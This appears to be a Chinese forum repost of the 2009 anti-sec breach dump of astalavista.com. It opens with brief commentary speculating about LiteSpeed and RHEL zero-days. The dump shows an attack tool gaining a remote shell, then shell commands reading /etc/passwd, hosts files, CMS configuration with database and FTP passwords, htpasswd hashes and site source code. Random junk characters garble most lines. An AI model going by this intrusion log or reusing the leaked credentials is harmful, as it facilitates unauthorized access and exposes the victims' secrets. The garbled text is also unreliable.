里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。 A4 }# d! D7 y y
, ?; _1 ^& G3 n5 g' \
[root@front3 ~]# curl -I litespeedtech.com
! e+ v9 l; o' }( U' pHTTP/1.1 200 OK
' }( {4 ]2 M5 a- F/ CDate: Fri, 05 Jun 2009 22:54:51 GMT* @5 T! V% b |1 P' T, B* c
Server: LiteSpeed: f* n8 O& C" ?) @
. ]+ E/ b1 Z1 g& [- }/ i
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
. S/ Q2 O1 \' @2 c, o2 o8 t0 Z/ `& s/ ^! [ r
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
. H, I& d9 k, \3 P
' n( {7 V, h# {' \% i& X7 w0 c* l& R, G( d, F
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
- x' H) h) R4 N" Q' { A/ M/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \; Y/ _* c9 d8 D& ^% f6 ?# O8 E
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
# J0 ?& |. b- c! B: a\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
3 o. h, b6 X' z' A5 g \/ \/ \/ \/ \/ \/ \/
3 w: v% q- [ o0 D O b% C) ] The Hacking & Security Community! D! W9 _! f* Q/ t3 }: ]$ w
[+] Founded in 1997 by a hacker computer enthusiast' c& b: ]5 p4 e( Z: {
[-] Exposed in 2009 by anti-sec group/ h2 p; |1 l! \
/ o8 \) \% j: O+ t; f0 xFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
+ S! c: l7 \3 _- b+ J+ \>> 03. Who’s behind the site?+ Z+ c" [0 [( N8 k# n W. w& t
>>
# }0 x: s3 c7 c4 G# z* `>> A team of security and IT professionals, and a countless number of contributors from all over the world.
L1 H. |1 c( @4 _
2 M( u+ r! P- v# S9 a6 K/ D& H>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
( _6 z3 h! M4 v. D>>, s+ m% z% \: T5 p- u
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and" B7 [- z% I1 L B* k" R
military institutions.
5 V/ |! j) z* c0 H; l) f- {1 u+ B>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information., k: O- ?4 g H$ r/ V
- P2 l4 ?8 l- L, z' M! H9 T
Why has Astalavista been targeted?
% u( q5 f ?7 I& \( o) H5 l# q0 q8 b" ^$ B- t) ]
Other than the fact that they are not doing any of this for the “community” but
8 Y% L" T; m% n8 ~for the money, they spread exploits for kids, claim to be a security community
* L5 x, y" t! ^( ]3 @(with no real sense of security on their own servers), and they charge you $6.66
/ [5 y* r6 ~, f* a! G0 Sper months to access a dead forum with a directory filled with public releases
- e2 L' C% p i5 H$ Qand outdated / broken services.# e, ]2 d; m/ N) U+ C
, m1 U: S/ I W$ d9 w
We wanted to see how good that “team of security and IT professionals” really is.
6 n4 ~0 |' ?: ^3 D q( Z% t; A
3 A' U% R4 ~' d- |) P! HLet’s begin.7 C1 m' d6 f$ Z/ J
' p0 ?% |8 O5 k' h1 ?4 Canti-sec:~# ./g0tshell astalavista.com -p 80% c' v6 d. I' D9 I9 S* P; l
[+] Connecting to astalavista.com:809 l+ o7 H" g' t. C* T; [; _
[+] Grabbing banner…
! @* ~4 Z, l, Q0 b& r7 L& `LiteSpeed
& L Z5 _0 m; o. X[+] Injecting shellcode…
k8 i; U; O4 X$ s# Y9 I[-] Wait for it6 H2 e5 m% p/ `% z) f1 q6 c
; A+ H# T; f( x/ [[~] We g0tshell' _- X1 Z5 B4 Z5 y, e) t0 W
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
9 Y: K( g; @! q& j5 k8 T. F& p- qID: uid=100(apache) gid=500(apache) groups=500(apache)
% n& i) |7 Z: r/ s& Q% M
, |- W# _) Q" R: @) q" o! _sh-3.2$ cat /etc/passwd
; n: B" ^' n6 F. P8 p& T# L! aroot:x:0:0:root:/root:/bin/bash
( H% |7 T' Y" B. F& Qbin:x:1:1:bin:/bin:/sbin/nologin
$ r7 }) l a. T3 H; V+ Mdaemon:x:2:2:daemon:/sbin:/sbin/nologin
/ m( ~8 c$ Y7 h- y5 _4 hadm:x:3:4:adm:/var/adm:/sbin/nologin
+ l2 o/ b0 `8 Xlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin0 N! w \. ?0 @# f
sync:x:5:0:sync:/sbin:/bin/sync# j3 T/ Y! _& J7 v- e) O
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
# P. k" ^+ N8 Y& ^halt:x:7:0:halt:/sbin:/sbin/halt! K1 x- L0 [: s0 F1 s
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
5 j7 J5 p' i8 T! `$ Jnews:x:9:13:news:/etc/news:
( a8 t+ d L+ ^- o& G+ cuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
& }/ [! m) N) [5 b. X4 n( ^operator:x:11:0 perator:/root:/sbin/nologin
% z. K- ^4 Y* D) ?games:x:12:100:games:/usr/games:/sbin/nologin
4 d+ o; K+ ~' [gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- n) m' g) e) B1 [5 Zftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
_$ o% z# Q) a4 v* e2 fnobody:x:99:99:Nobody:/:/sbin/nologin
6 s2 P Y Z! |rpm:x:37:37::/var/lib/rpm:/sbin/nologin4 X; l4 [+ S9 t. V* [
dbus:x:81:81:System message bus:/:/sbin/nologin
6 f1 z1 P- {, W- @% Unscd:x:28:28:NSCD Daemon:/:/sbin/nologin) ], f5 b# l. {- v6 E
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
% I1 P# Z4 C3 m+ Nsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin' b( p+ e( z2 A/ _2 ^$ o: w/ y6 F
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin. Y4 m% t# k& u/ Y. X
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
4 v m' G7 c- |rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin v# b: U0 ^1 H+ o7 z D( \7 ?
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
. [2 f/ G D6 q) nnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin6 C _( } k2 E1 g
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin0 T( U4 Z8 M) a9 l' n7 q$ C. I
pcap:x:77:77::/var/arpwatch:/sbin/nologin
1 L" Q6 v: S1 Q9 d7 Fnamed:x:25:25:Named:/var/named:/sbin/nologin
) N0 ~( P& ]- O" y! N5 d' r0 yapache:x:100:500::/var/www:/bin/false$ a* Y1 m$ p( @
diradmin:x:101:101::/usr/local/directadmin:/bin/bash/ A$ I+ |' S, _& c4 k* z
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
( G+ {, ?. [+ `2 m* A6 q2 S$ v' ?webapps:x:500:501::/var/www/html:/bin/bash! d5 `) V; _, H: M% v/ f
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash, e! ]5 W* r/ ]2 ~
admin:x:501:502::/home/admin:/bin/bash2 |( R. g& @/ h& Q
jon:x:502:503::/home/jon:/bin/bash- b8 R! w8 U/ K7 _0 h; p
com:x:503:504::/home/com:/bin/bash
# L; `8 r. K, ?ntp:x:38:38::/etc/ntp:/sbin/nologin
# o! s6 n) \* v% Rais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
* A. Y2 f _& W: | b$ Z' x8 Pastanet:x:504:505::/home/astanet:/bin/bash
6 L6 ]9 y0 E2 G6 A) b' Xavahi:x:70:70:Avahi daemon:/:/sbin/nologin
! l0 \, A) @. y4 W) Xavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin+ ]# a3 @" a* r
& k5 Y# ?; c5 W V4 U" f, \sh-3.2$ cat /etc/hosts; i( W8 i+ t: ?: @) ?' J+ y
# Do not remove the following line, or various programs
- P0 v' X4 ?& t0 }8 A3 j# that require network functionality will fail.. H8 R3 A8 {% J1 y a
127.0.0.1 localhost.localdomain localhost
B; v' Y* c$ ~9 e4 O::1 localhost6.localdomain6 localhost62 p0 T o+ h$ ^* z/ h- N% d, @* O
80.74.154.172 asta1.astalavistaserver.com
* N# T3 N5 |9 G# q' `/ i& h/ F- i! M% E4 e
sh-3.2$ pwd
) B* ^7 L9 t, v4 {/home/com/public_html
/ G' H3 y' N4 `1 W- q/ s! M- u) w8 o) Q, @2 C* q; q) ~: e
sh-3.2$ ls -la
8 b% c5 |* g9 Q7 N& r% p2 ^. E2 Vtotal 18460
/ _( b5 |5 e5 W% B, Cdrwxr-xr-x 30 com apache 4096 May 28 17:06 .3 q" c- ^3 n2 \4 @
drwx–x–x 11 com com 4096 Jun 25 2008 ..
1 z9 A4 _" n5 c6 fdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin6 z) O* \" k) R2 P, H1 g
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache# i$ V- V/ C# X$ j2 E! W
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
# y: ?) Y+ {( Q2 }! fdrwxrwxrwx 2 com com 4096 May 19 00:50 config* ]0 C5 \2 @9 e: h8 m1 D
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core# U* d- N1 S3 A: P8 p
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
7 g. `5 P" `; q M$ G" B! |; bdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing% O/ b' J3 R1 Y
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
5 Q( P0 k- g* `drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
5 M) X9 P/ }- S. ?-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php3 x, A6 k6 b9 S( z# o. F/ q# t4 p
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
+ [: G0 S6 Q* w$ f* n+ {drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
* k# L- l( x7 X! M; U-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
' `- [; B/ l2 q5 ?drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
' \9 {: ~& \6 f7 m: a( I0 z5 _/ `-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess! L9 J% F8 g) h1 l5 v3 P, O
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
+ X3 X6 i2 T6 N) v! d& @-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
# Z" l" A- f3 odrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
2 C$ `# {5 ]* Idrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
; z% {0 B- a* U, w-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php6 k! k9 s- i: q4 M# H k+ H
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer. |0 q) K3 @& t1 s, \
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang- c" i9 W; F2 H% ~
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
) z" @/ w# R& D# Gdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
f: ^4 j$ O. \; ^1 G( S ~drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
$ q! }% t" d4 D; {3 O( bdrwxr-xr-x 34 com com 4096 May 28 16:30 modules+ m5 D* A% N. S4 y& ^
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin; m! E1 i# N F; p9 t. A$ ?# O
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
" ^" z+ X* q. y0 ^4 h5 Udrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
\. M) X' a/ R! ~' ~drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy, [/ I9 u( Z: S7 c) s) m2 K( B3 T
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy9 z# k3 s Q( L2 q1 ?
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt) S1 r Q/ z7 t7 A1 q) f7 Q
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml* i3 k* @, e6 j8 [
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
/ ~) R% [, N# f& z8 {, gdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes& C. ]9 N. |8 {- p+ S1 J, B4 C1 m
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp. m0 Y9 c8 ^: P% c' G# ?. K
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam. z& t0 [8 I, p
6 ^4 m3 r- g1 e- E( bsh-3.2$ head -20 index.php- O% r* r% v9 m
<?php
2 S! S, [& B/ j2 _5 T
5 b6 y, U! c9 `* [' K6 E* V! R3 J/**
4 a/ P5 e0 M+ k) {* The main page for the CMS4 G1 o) B! k0 ?, j
* @copyright CONTREXX CMS - COMVATION AG
3 }* G I( g+ M* Y1 K3 _* @author Comvation Development Team
3 S) a* N8 Z! T( m8 |' j+ N* @version v1.0.9.10.1 stable/ [1 c7 J' \6 v6 }8 Y+ _- o
* @package contrexx
2 l& e* f/ G; d! d7 U& c* q6 T* @subpackage core
6 u7 L) t1 E( q2 H8 I* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage- |$ J$ Z+ H2 ?: _
* @since v0.0.0.0
" E) |2 ]3 u9 P. J* @todo Capitalize all class names in project) q) v7 v8 Q, y9 F4 {& u; I2 N3 z
* @uses /config/configuration.php
- v- c4 F& W$ }, ~2 P, w4 B# U* @uses /config/settings.php
" e; C I' b% w+ g& l7 J; _* @uses /config/version.php/ N" a% w$ m+ ~
* @uses /core/API.php
( E" R$ f ?2 x' M' S8 D* @uses /core_modules/cache/index.class.php9 x; V- R( ~0 i, q( C1 a
* @uses /core/error.class.php7 l T& v! T; H- V2 t" A( e
* @uses /core_modules/banner/index.class.php
# W7 G& U7 t" f' e j* @uses /core_modules/contact/index.class.php' j1 M) }7 L' S8 T: k/ f
! k4 p4 K+ @6 w$ p' fsh-3.2$ cd config/
W- L$ R$ ] ash-3.2$ ls -la& O( [* M& `' M3 Q. r0 D3 G4 Q
total 328 D- g0 Y, @" U. \+ `$ Q. W% m! O
drwxrwxrwx 2 com com 4096 May 19 00:50 .
, o: y" o% Y* }3 Wdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
9 b6 T5 T0 {* o3 Z5 w# a+ ?-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
# _% v2 y: @2 h/ ~4 `-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php) U4 k; w/ H8 X5 _; `, @- f
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
" w" t& P# W5 M" D' l-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php5 r0 b( b, k7 X- l2 B9 n
9 d( Q6 j. m+ h- f6 h# n6 Y6 ~
sh-3.2$ cat configuration.php
5 {3 p9 p5 p" M) B5 c8 c9 T[snip]- X: m1 R& ^& j- ?0 m1 A
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost. T, c! t1 Y H: M
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name6 g% {) J8 W' Z! ]
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
! Z& n4 N& e4 T$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username$ w+ E$ [) L4 s% X
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
( a0 c6 A6 z' j: e ~$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)0 s- g3 V' M! f; A2 R
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
( J& }& T1 v! n. q[snip]
2 k; t! I E$ J( M, n' l# {8 v; ]6 D; I @$_FTPCONFIG['is_activated'] = true; // Ftp support true or false7 {- |* g6 y& o
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode* e: E) @6 D6 z6 ~" f
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
4 c+ R# a( h+ i: H! M7 E/ }2 ?" v$_FTPCONFIG['port'] = 21; // Ftp remote port
: _, }/ y' m [1 s- H' H$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
- V& S1 Q+ H+ s4 z2 M" X$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password- `2 c& F, K/ G. C, {
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
: n; I: \: u3 C# Q# v5 x
4 z- ~) y! M _, Esh-3.2$ cd ..
0 h! ` a! R) ^" @, W! Ish-3.2$ cd dvd/
* w- i! U$ J& j( l! ssh-3.2$ ls -la
4 ~; A! }& G7 L% |0 Z# N# dtotal 2913780
9 _7 j; e, @' I* qdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
6 [4 I, K: ^9 M* h3 c; i# udrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
6 j9 x6 u7 \8 J7 M$ F-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
1 g" D; k ]8 O) A0 i. S2 |! V# o-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar: B! P9 I3 s7 {9 D
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar' E7 I# s1 l+ r1 t2 P! y( ?2 N
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess" y3 D ~, j7 c! O% g
: b* O- M2 W1 j1 Ksh-3.2$ cat .htaccess
1 d& j2 T( {0 b# w% E6 x# SauthType Basic+ l( Y r/ x& l1 J& c$ k: @
authName DVD2 _5 r$ ?. F7 _# e S) ]
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd$ l0 }9 g* u/ ~; }- ]9 b
require valid-user
5 m9 V- a: n$ P) I7 A' i& X7 E8 E; Y" ~8 x5 j& L
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd! r8 x! w! W& L) A- u( U
DVDdownload:CRD8cuY6.MPT6/ [8 S) o0 j. J+ F
DVDdownload2:CR8a36.wluFMg1 k& ^) N( z0 D4 @* c
( f- I; V9 m" r
sh-3.2$ cat test.php
1 b: n' L; D2 T2 B<?php
& {4 i, k- c6 ~+ o1 K& a1 ?+ @& z$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
8 Z! ^7 t, V8 b. i1 [1 R$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
7 B2 z/ }: Q1 N) x, eecho $url;7 ^7 o1 k) n- W0 X
?>$ d( Z3 j5 N0 B9 |* i0 f
# i0 U0 }5 J+ I) M; a* V
sh-3.2$ cd modifications/) G: P4 b: _' _+ \0 D5 {; o
sh-3.2$ ls -la2 P7 b, Q5 R6 ]8 Q( B4 E
total 32! ^: _% j; P) |4 V( X6 M8 y
drwxr-xr-x 8 com com 4096 May 11 12:48 .( Q8 m. r/ q6 i% \3 `+ {: i
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
! P, e9 _5 {" c7 i0 k0 R- q, ddrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng) b1 }2 _3 a, Y- o! L4 A& ^
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
% c o4 O$ M& Y# L/ d. g. {drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools. Y$ R+ l+ o; I, B
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
, G+ Y1 w1 Y5 q; |drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
7 B) x# x; I- l# \drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp& e, P F# O: R: f4 n" ~
! d, v. }% s; D8 v
sh-3.2$ ls -R
; H' G2 A6 R: S+ m. G.:
9 l/ d% m" G1 X5 r jcom_avtng cronjobs onlinetools pjirc search _tmp
! @3 ~, m& f1 M0 Y* |) s! D
' V* R3 \! ~+ g0 p$ k/ U! d./com_avtng:4 D" S5 [5 [! u' V& C3 g E f
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
8 E, w+ d a: R h/ x, |( D6 A/ P3 V
; O9 j( O* M( Z$ V% |./com_avtng/scripts:
( I& y2 i) {0 f) z1 ^8 Gpopunder.js
7 \: H& l! u! c6 y% Z# ~2 `* c+ g6 u. n: z, c9 @- e
./cronjobs:
e& M4 |; |8 T) {exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp$ J5 u$ x; S$ I, I$ C
# `, M7 H3 i o7 O
./cronjobs/tmp:
5 p; d! x7 @. V6 N' r7 t5 Vcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv% L, q! E, u b) y+ _) {4 w
! B, `- u5 L# \( s
./onlinetools:
. v1 M5 R f+ W; H1 R4 H" qindex.php4 Y* c7 H& q* [) b$ P- M* E) g2 ?
# ]2 u* P& N6 J& K2 a./pjirc:
" \$ J! T' m( S" m# la_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
: O( Z5 T# O+ d5 E. \AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt; ?. `2 W5 Q# z& ^
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd6 N6 k4 R( s( X1 _6 D$ x5 d4 s: ~
9 B- r4 f' c: M) o! J
./pjirc/img:
- A; Q' U) m+ Qange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
4 [' t- R9 x0 i5 K2 z" K+ S, Farbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
" ^5 S! V; c9 E; C- J' @verre-eau.gif
; l7 r7 B# e- i& L: C# d' Q/ |argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
1 }" ?. U1 `8 ?* P+ N5 H" e3 kverre-vin.gif
7 ]. e2 q# \1 oballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
7 k4 b0 `6 [" J) `5 ^biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif0 A* |" R. e, Y
" n5 Q8 F1 ~/ d* J7 t
./pjirc/snd:
5 V$ q/ F1 W& b; r' |bell2.au ding.au8 N V# Q7 {, |) b- @( w# d) s1 W, r
% P3 |3 R. x- k4 d4 T& Q9 F! F- T9 c
./search:: ~! p/ |2 T& c0 q! O
searchEngines.php search.php' F5 N5 d4 } T( [
, K9 h! S% t$ ^./_tmp:
: }- g0 X( f) j O% L7 B0 O" SdefaultPorts.php defaultPorts.txt5 t% I0 y& u! t+ E4 i1 k: B
4 `7 q X$ E: [+ y. M3 R' T' t/ Zsh-3.2$ cd cronjobs/
# P, z: R" i# ^% F# |! }sh-3.2$ cat exploits.php8 ?! O, {) X6 R) ?9 f; H0 G3 Z
[snip]+ w: B+ w9 F# J% d! t4 q4 P! }
$categories = array();
$ H* {( r% c# B- y$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;- O( {# D5 O- m n0 }) j: m
$expolits = file($milw0rmFile);
$ Y+ O% O/ }" _! e+ @5 U4 ~$comExploits = array();$ d: F' R* t2 z* g; K
[snip], [& n0 ]3 z7 c( {
// manage data
. v: Y8 E7 w' y' y4 w" n# I Pfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
5 u; }. {, c- b( R; |9 ]: m/ U1 u+ b( c1 U/ |9 J& f/ P% ~: p
// get path and title
h7 N5 h1 f' y% U4 Q3 Y1 t $expolits[$x] = trim($expolits[$x]);% T' Y; Q% Q$ r. d8 e3 @; r
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
* k: |! E" E) t; b, s $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
3 d9 {) i n" [7 m4 ]
8 j! O$ p8 i8 x) s; W g1 t // check if file exists
1 U$ n; G# B8 C3 D$ T% n if (file_exists($path)) {' ~+ D, U2 p2 }1 C# E% F j4 C7 o
& E; ~' w/ V& q" m$ W+ r: e1 P
$text = file_get_contents($path);
8 B/ E, J" N2 z! N! U6 c& m( Y* S/ |. C7 l% U
// get content and date
. T% {8 |+ F! y8 @! F //$text = htmlspecialchars($text, ENT_QUOTES);
2 ?; K! }& M7 X5 @, h* k* f $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));2 \* R3 U: F4 T2 X) g
if ($tmptext != ”) {
& l; R- e: n& w. f3 A$ X $text = $tmptext;3 B: J+ g1 `6 N1 T9 V
} else {
3 \# W( M2 g5 {! j7 T& h% p $text = addslashes(htmlentities($text, ENT_QUOTES));8 c! m3 P f% n I$ P8 j8 V
}
+ Y" J9 }- r: M3 J0 Q) v( p. o $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
! @& I& ~: v+ {# `" |9 @ $tmp = explode('-', $date);1 [, @# d6 @0 b" l1 q
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
5 \7 l f3 f% F }: o $cat = getCategory ($path);
4 q" y2 ~2 w& y$ t! a* g $ext = pathinfo(basename($path));7 b6 h! f0 Q$ G( x5 _
$ext = $ext['extension'];$ j# t8 U8 |8 {! Z- a( [) ~
$qStr = ”+ W5 M: Y; p6 K! q
SELECT `id`
/ g" e) i A% s$ H FROM `contrexx_module_exploits`% R: i {, n, i
WHERE `title` = ‘” . $title . “‘1 q/ [6 ?/ |2 E
AND `date` = ‘” . $date . “‘
0 e2 h: S2 {+ X2 l6 F0 r “;
, [3 g& x% }( B V/ N) p& r echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
% l9 d: G5 K- K, G $q = $_objDB->query($qStr);
+ s6 G& N4 }" ^+ U7 e3 S
* a5 a6 p: C' N. d; | if ($q->numRows() == 0) {
& o) e. k: }7 o6 i0 n. S5 {% V9 |
/ ~$ C0 L1 @+ i! T // prepare array6 B0 z8 C3 U5 y6 _
$comExploits[$x]['date'] = $date;; g, d& `5 h2 M- O- D0 k/ l
$comExploits[$x]['title'] = $title;
+ D5 E5 e2 A+ k( n& K $comExploits[$x]['author'] = ‘milw0rm’;
' K. ^! p! y& ?) C( Q* | $comExploits[$x]['text'] = $text;) h- F, P( M8 [7 A# _- M: y4 W# S
$comExploits[$x]['source'] = $ext;
; w; S6 R, A; {& O5 C $comExploits[$x]['url1'] = ”;
) t$ P/ d& i1 W @ $comExploits[$x]['url2'] = ”;
6 |. Z3 Z1 q2 ~9 G+ | $comExploits[$x]['catid'] = $cat;3 W/ l% ^% `- A( u+ L+ p
$comExploits[$x]['lang'] = ‘2′;1 G8 D X4 S( k. O) h
$comExploits[$x]['userid'] = ‘12′;
. Q7 q+ d' Y3 B8 s9 J0 F9 R $comExploits[$x]['startdate'] = ‘0000-00-00′;2 L5 V9 V) U& l o# k( F9 C$ N
$comExploits[$x]['enddate'] = ‘0000-00-00′;5 w$ w: y2 E8 i0 h4 C
$comExploits[$x]['status'] = ‘1′;
5 g8 E. m3 O7 b) ~5 x% E5 W9 N g# J $comExploits[$x]['changelog'] = $date;
6 P( \" N. H- I* H% E- t7 o1 t( q' t1 j9 t# E7 o1 N b4 r
}
8 R- b- P4 i* }[snip]
1 w& W) F6 n9 I4 O' a0 C $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>. \' v' P8 L6 L; O4 d# m f
<rss version=”2.0″>) W+ G0 m4 c& h6 W* C1 ~
<channel>
- F0 \7 s! X% s6 S X- z9 P# b8 X& y <title>ASTALAVISTA.com - Exploits</title>% @ O, [: H& |
<link>http://www.astalavista.com/exploits</link>$ V. ^9 Q2 q+ g4 x" p; z
<description>All availably Exploits.</description>: E0 M) K) u. n9 v4 G0 ]
<language>en-us</language>8 {4 f6 E# N5 a% [
